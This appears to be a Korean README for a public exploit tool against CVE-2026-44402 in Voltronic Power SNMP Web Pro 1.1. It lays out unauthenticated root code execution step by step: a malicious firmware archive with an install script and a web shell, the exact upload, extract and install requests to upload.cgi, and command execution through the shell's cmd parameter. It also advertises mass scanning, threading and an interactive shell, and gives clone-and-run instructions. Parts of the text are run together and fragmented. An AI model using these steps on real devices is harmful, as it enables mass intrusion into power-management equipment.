
CVE-2026-44402에 대한 익스플로잇으로, Voltronic Power SNMP Web Pro 1.1을 대상으로 하며 악성 펌웨어 업로드를 통해 인증 없이 원격 코드 실행을 가능하게 합니다. 단일 대상 및 대량 스캔을 지원하며 인터랙티브 셸을 제공합니다.
| 속성 | 값 |
|---|
| CVE ID | CVE-2026-44402 |
| CVSS 점수 | 9.8 (치명적) |
| CWE | CWE-434 — 위험한 유형의 파일 무제한 업로드 |
| 영향받는 제품 | Voltronic Power SNMP Web Pro 1.1 |
| 인증 필요 | 아니요 (인증 없음) |
| 공격 벡터 | 네트워크 기반 (원격) |
| 권한 | Root 수준 RCE |
취약점은 펌웨어 업데이트 기능(upload.cgi)에 존재합니다. 해당 엔드포인트는:
악성 아카이브 생성
upgrade/install.sh — 설치 스크립트upgrade/pwned.cgi — 웹 셸아카이브 업로드 → POST /cgi-bin/upload.cgi?name=upgrade&?params=upload
"ACK"아카이브 추출 → GET /cgi-bin/upload.cgi?name=upgrade&?params=extract
"ACK"설치 → GET /cgi-bin/upload.cgi?name=upgrade&?params=install
install.sh가 root로 실행됨"ACK"웹 셸 활성화 → POST /cgi-bin/pwned.cgi
cmd 매개변수로 명령 실행 → RCE! 🚀-u)-f targets.txt)-t 20) — 빠른 병렬 처리--shell) — cd 지원url | output 형식--proxy)--timeout)-v)requests 및 prompt_toolkit 외 외부 의존성 없음# 저장소 복제
git clone https://github.com/0xCyp1337/CVE-2026-44402.git
cd CVE-2026-44402
python3 CVE-2026-44402.py